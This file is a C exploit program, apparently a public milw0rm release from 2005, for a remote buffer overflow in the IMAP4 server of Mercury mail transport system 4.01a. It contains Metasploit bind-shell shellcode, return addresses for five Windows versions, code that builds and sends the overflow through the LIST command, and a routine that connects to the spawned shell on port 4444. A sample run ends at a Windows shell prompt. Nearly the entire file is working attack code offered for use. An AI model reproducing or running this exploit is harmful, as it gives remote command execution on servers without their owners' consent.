309 lines
No EOL
9 KiB
C
309 lines
No EOL
9 KiB
C
/*
|
|
Mercury imap4 server remote buffer overflow exploit
|
|
author : c0d3r "kaveh razavi" c0d3r@ihsteam.com c0d3r@c0d3r.org
|
|
package : Mercury mail transport system 4.01a and prolly prior
|
|
workaround : upgrade to 4.01b version
|
|
advisory : not available right now
|
|
company address : www.pmail.com
|
|
timeline :
|
|
15 Sep 2005 : vulnerability reported by securiteam mailing list
|
|
20 Sep 2005 : IHS exploit released
|
|
exploit features :
|
|
1) 5 working targets including win2k , winxp , win2k3
|
|
2) reliable metasploit shellcode
|
|
3) autoconnect to shell
|
|
bad chars are : 0x20 0x0a
|
|
compiled with visual c++ 6 : cl mercury_imap.c
|
|
greeting to :
|
|
www.ihsteam.com the team , LorD and NT heya
|
|
www.ihsteam.net english version ,
|
|
www.exploitdev.com Jamie and Ben the two good brothers also my brothers
|
|
www.metasploit.com when are you gonna release the newer version :P ?
|
|
www.class101.org class with his new laptop :>
|
|
www.milw0rm.com str0ke , I am sending it to you first dont doubt :d
|
|
www.c0d3r.org study time started :((( , pitty for the c0d3r !
|
|
shout to actionspider
|
|
read these lines and try to understand ( I know you cant akhey ) that
|
|
an script kiddie (defacer) never ever could be compared to an exploit coder
|
|
try to grow , being grown up is not related to age -- with respects
|
|
/*
|
|
/*
|
|
|
|
D:\projects>mercury_imap.exe ihs 143 4 c0d3r abc
|
|
|
|
-------- mercury imap remote BOF exploit by c0d3r
|
|
|
|
[+] target : windows 2003 server enterprise service pack 1
|
|
[+] building login data
|
|
[+] building overflow string
|
|
[+] attacking host ihs
|
|
[+] packet size = 625 byte
|
|
[+] connected
|
|
[+] sending login info
|
|
[+] sending exploit string
|
|
[+] exploit sent successfully to ihs
|
|
[+] trying to get shell
|
|
[+] connecting to ihs on port 4444
|
|
[+] target exploited successfully
|
|
[+] Dropping into shell
|
|
|
|
Microsoft Windows [Version 5.2.3790]
|
|
(C) Copyright 1985-2003 Microsoft Corp.
|
|
|
|
H:\MERCURY>
|
|
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <string.h>
|
|
#include <winsock2.h>
|
|
#pragma comment(lib, "ws2_32.lib")
|
|
#define NOP 0x90
|
|
#define size 625
|
|
// nops + return address + 16 nops + shellcode 260 + 4 + 16 + 344 + 1
|
|
|
|
|
|
// metasploit shellcode LPORT=4444 Size=344 Encoder=PexFnstenvSub
|
|
// bad chars : 0x00 0x0a 0x20 0x0d
|
|
|
|
char shellcode[]=
|
|
"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x92"
|
|
"\xc9\xd2\x3b\x83\xeb\xfc\xe2\xf4\x6e\xa3\x39\x76\x7a\x30\x2d\xc4"
|
|
"\x6d\xa9\x59\x57\xb6\xed\x59\x7e\xae\x42\xae\x3e\xea\xc8\x3d\xb0"
|
|
"\xdd\xd1\x59\x64\xb2\xc8\x39\x72\x19\xfd\x59\x3a\x7c\xf8\x12\xa2"
|
|
"\x3e\x4d\x12\x4f\x95\x08\x18\x36\x93\x0b\x39\xcf\xa9\x9d\xf6\x13"
|
|
"\xe7\x2c\x59\x64\xb6\xc8\x39\x5d\x19\xc5\x99\xb0\xcd\xd5\xd3\xd0"
|
|
"\x91\xe5\x59\xb2\xfe\xed\xce\x5a\x51\xf8\x09\x5f\x19\x8a\xe2\xb0"
|
|
"\xd2\xc5\x59\x4b\x8e\x64\x59\x7b\x9a\x97\xba\xb5\xdc\xc7\x3e\x6b"
|
|
"\x6d\x1f\xb4\x68\xf4\xa1\xe1\x09\xfa\xbe\xa1\x09\xcd\x9d\x2d\xeb"
|
|
"\xfa\x02\x3f\xc7\xa9\x99\x2d\xed\xcd\x40\x37\x5d\x13\x24\xda\x39"
|
|
"\xc7\xa3\xd0\xc4\x42\xa1\x0b\x32\x67\x64\x85\xc4\x44\x9a\x81\x68"
|
|
"\xc1\x9a\x91\x68\xd1\x9a\x2d\xeb\xf4\xa1\xc3\x67\xf4\x9a\x5b\xda"
|
|
"\x07\xa1\x76\x21\xe2\x0e\x85\xc4\x44\xa3\xc2\x6a\xc7\x36\x02\x53"
|
|
"\x36\x64\xfc\xd2\xc5\x36\x04\x68\xc7\x36\x02\x53\x77\x80\x54\x72"
|
|
"\xc5\x36\x04\x6b\xc6\x9d\x87\xc4\x42\x5a\xba\xdc\xeb\x0f\xab\x6c"
|
|
"\x6d\x1f\x87\xc4\x42\xaf\xb8\x5f\xf4\xa1\xb1\x56\x1b\x2c\xb8\x6b"
|
|
"\xcb\xe0\x1e\xb2\x75\xa3\x96\xb2\x70\xf8\x12\xc8\x38\x37\x90\x16"
|
|
"\x6c\x8b\xfe\xa8\x1f\xb3\xea\x90\x39\x62\xba\x49\x6c\x7a\xc4\xc4"
|
|
"\xe7\x8d\x2d\xed\xc9\x9e\x80\x6a\xc3\x98\xb8\x3a\xc3\x98\x87\x6a"
|
|
"\x6d\x19\xba\x96\x4b\xcc\x1c\x68\x6d\x1f\xb8\xc4\x6d\xfe\x2d\xeb"
|
|
"\x19\x9e\x2e\xb8\x56\xad\x2d\xed\xc0\x36\x02\x53\x62\x43\xd6\x64"
|
|
"\xc1\x36\x04\xc4\x42\xc9\xd2\x3b";
|
|
|
|
|
|
void gotshell (int newsock);
|
|
unsigned int rc,sock,os,addr,rc2 ;
|
|
struct sockaddr_in tcp;
|
|
struct hostent *hp;
|
|
WSADATA wsaData;
|
|
char buffer[size];
|
|
char point_esp[5];
|
|
unsigned short port;
|
|
char req1[] = "\x30\x30\x30\x30\x20\x4C\x4F\x47\x49\x4E";
|
|
char req2[] = "\x30\x30\x30\x31";
|
|
unsigned char *login,*exploit;
|
|
char vuln_command[] = "\x4C\x49\x53\x54";
|
|
char winxpsp1[] = "\xCC\x59\xFB\x77"; // jmp esp in ntdll
|
|
char winxpsp2[] = "\xED\x1E\x94\x7C"; // jmp esp (not tested)
|
|
char win2ksp4[] = "\x23\xde\xaf\x01"; // call esp in kernel32.dll
|
|
char win2k3_sp0[] = "\xAB\x8B\xFB\x77"; // jmp esp in ntdll
|
|
char win2k3_sp1[] = "\x6A\xFA\xE8\x77"; // push esp - ret in kernel32
|
|
|
|
int main (int argc, char *argv[]){
|
|
|
|
|
|
if(argc < 6) {
|
|
printf("\n-------- mercury imap remote BOF exploit by c0d3r\n");
|
|
printf("-------- usage : imap.exe host port target username password\n");
|
|
printf("-------- target 1 : windows xp service pack 1 : 0\n");
|
|
printf("-------- target 2 : windows xp service pack 2 : 1\n");
|
|
printf("-------- target 3 : windoes 2k advanced server sp 4 : 2\n");
|
|
printf("-------- target 4 : windoes 2k3 server enterprise sp0 : 3\n");
|
|
printf("-------- target 5 : windoes 2k3 server enterprise sp1 : 4\n");
|
|
printf("-------- eg : imap.exe 127.0.0.1 143 0 c0d3r abc\n\n");
|
|
exit(-1) ;
|
|
}
|
|
printf("\n-------- mercury imap remote BOF exploit by c0d3r\n\n");
|
|
os = (unsigned short)atoi(argv[3]);
|
|
switch(os)
|
|
{
|
|
case 0:
|
|
strcat(point_esp,winxpsp1);
|
|
printf("[+] target : windows xp service pack 1\n");
|
|
break;
|
|
case 1:
|
|
strcat(point_esp,winxpsp2);
|
|
printf("[+] target : windows xp service pack 2\n");
|
|
break;
|
|
case 2:
|
|
strcat(point_esp,win2ksp4);
|
|
printf("[+] target : windows 2000 advanced server service pack 4\n");
|
|
break;
|
|
case 3:
|
|
strcat(point_esp,win2k3_sp0);
|
|
printf("[+] target : windows 2003 server enterprise service pack 0\n");
|
|
break;
|
|
case 4:
|
|
strcat(point_esp,win2k3_sp1);
|
|
printf("[+] target : windows 2003 server enterprise service pack 1\n");
|
|
break;
|
|
default:
|
|
printf("\n[-] this target doesnt exist in the list\n\n");
|
|
|
|
exit(-1);
|
|
}
|
|
|
|
printf("[+] building login data\n");
|
|
login = malloc(256);
|
|
memset(login,0,256);
|
|
sprintf(login,"%s %s %s\r\n",req1,argv[4],argv[5]);
|
|
|
|
// Creating heart of exploit code 4 5
|
|
|
|
printf("[+] building overflow string");
|
|
|
|
memset(buffer,NOP,size);
|
|
memcpy(buffer+260,point_esp,sizeof(point_esp)-1);
|
|
memcpy(buffer+280,shellcode,sizeof(shellcode)-1);
|
|
buffer[size] = 0;
|
|
exploit = malloc(1000);
|
|
memset(exploit,0,1000);
|
|
sprintf(exploit,"%s %s %s\r\n",req2,vuln_command,buffer);
|
|
|
|
// EO heart of exploit code
|
|
|
|
|
|
if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){
|
|
printf("[-] WSAStartup failed !\n");
|
|
exit(-1);
|
|
}
|
|
hp = gethostbyname(argv[1]);
|
|
Sleep(1500);
|
|
if (!hp){
|
|
addr = inet_addr(argv[1]);
|
|
}
|
|
if ((!hp) && (addr == INADDR_NONE) ){
|
|
printf("[-] unable to resolve %s\n",argv[1]);
|
|
exit(-1);
|
|
}
|
|
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
|
|
if (!sock){
|
|
printf("[-] socket() error...\n");
|
|
exit(-1);
|
|
}
|
|
if (hp != NULL)
|
|
memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length);
|
|
else
|
|
tcp.sin_addr.s_addr = addr;
|
|
|
|
if (hp)
|
|
tcp.sin_family = hp->h_addrtype;
|
|
else
|
|
tcp.sin_family = AF_INET;
|
|
port=atoi(argv[2]);
|
|
tcp.sin_port=htons(port);
|
|
|
|
|
|
printf("\n[+] attacking host %s\n" , argv[1]) ;
|
|
|
|
Sleep(1000);
|
|
|
|
printf("[+] packet size = %d byte\n" , sizeof(buffer));
|
|
|
|
rc=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
|
|
if(rc==0)
|
|
{
|
|
|
|
Sleep(1500) ;
|
|
printf("[+] connected\n") ;
|
|
printf("[+] sending login info\n") ;
|
|
send(sock,login,strlen(login),0);
|
|
Sleep(1500);
|
|
printf("[+] sending exploit string\n") ;
|
|
send(sock,exploit,strlen(exploit),0);
|
|
Sleep(1500);
|
|
printf("[+] exploit sent successfully to %s \n" , argv[1]);
|
|
printf("[+] trying to get shell\n");
|
|
printf("[+] connecting to %s on port 4444\n",argv[1]);
|
|
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
|
|
Sleep(1500);
|
|
if (!sock){
|
|
printf("[-] socket() error...\n");
|
|
exit(-1);
|
|
}
|
|
tcp.sin_family = AF_INET;
|
|
tcp.sin_port=htons(4444);
|
|
rc2=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
|
|
if(rc2 != 0) {
|
|
printf("[-] exploit probably failed\n");
|
|
exit(-1);
|
|
}
|
|
if(rc2==0)
|
|
{
|
|
printf("[+] target exploited successfully\n");
|
|
printf("[+] Dropping into shell\n\n");
|
|
gotshell(sock);
|
|
}
|
|
}
|
|
|
|
else {
|
|
printf("[-] ouch! Server is not listening .... \n");
|
|
}
|
|
shutdown(sock,1);
|
|
closesocket(sock);
|
|
}
|
|
void gotshell(int new_sock)
|
|
{
|
|
struct timeval tv;
|
|
int length;
|
|
unsigned long o[2];
|
|
char bufferx[1000];
|
|
|
|
tv.tv_sec = 1;
|
|
tv.tv_usec = 0;
|
|
|
|
while (1) {
|
|
|
|
o[0] = 1;
|
|
o[1] = new_sock;
|
|
|
|
length = select (0, (fd_set *)&o, NULL, NULL, &tv);
|
|
if(length == 1)
|
|
{
|
|
length = recv (new_sock, bufferx, sizeof (bufferx), 0);
|
|
if (length <= 0)
|
|
{
|
|
printf ("[-] Connection closed.\n");
|
|
WSACleanup();
|
|
return;
|
|
}
|
|
length = write (1, bufferx, length);
|
|
if (length <= 0)
|
|
{
|
|
printf("[-] Connection closed.\n");
|
|
WSACleanup();
|
|
return;
|
|
}
|
|
}
|
|
else
|
|
{
|
|
length = read (0, bufferx, sizeof (bufferx));
|
|
if (length <= 0)
|
|
{
|
|
printf("[-] Connection closed.\n");
|
|
WSACleanup();
|
|
return;
|
|
}
|
|
length = send(new_sock, bufferx, length, 0);
|
|
if (length <= 0)
|
|
{
|
|
printf("[-] Connection closed.\n");
|
|
WSACleanup();
|
|
return;
|
|
}
|
|
}
|
|
}
|
|
}
|
|
|
|
// milw0rm.com [2005-09-20]
|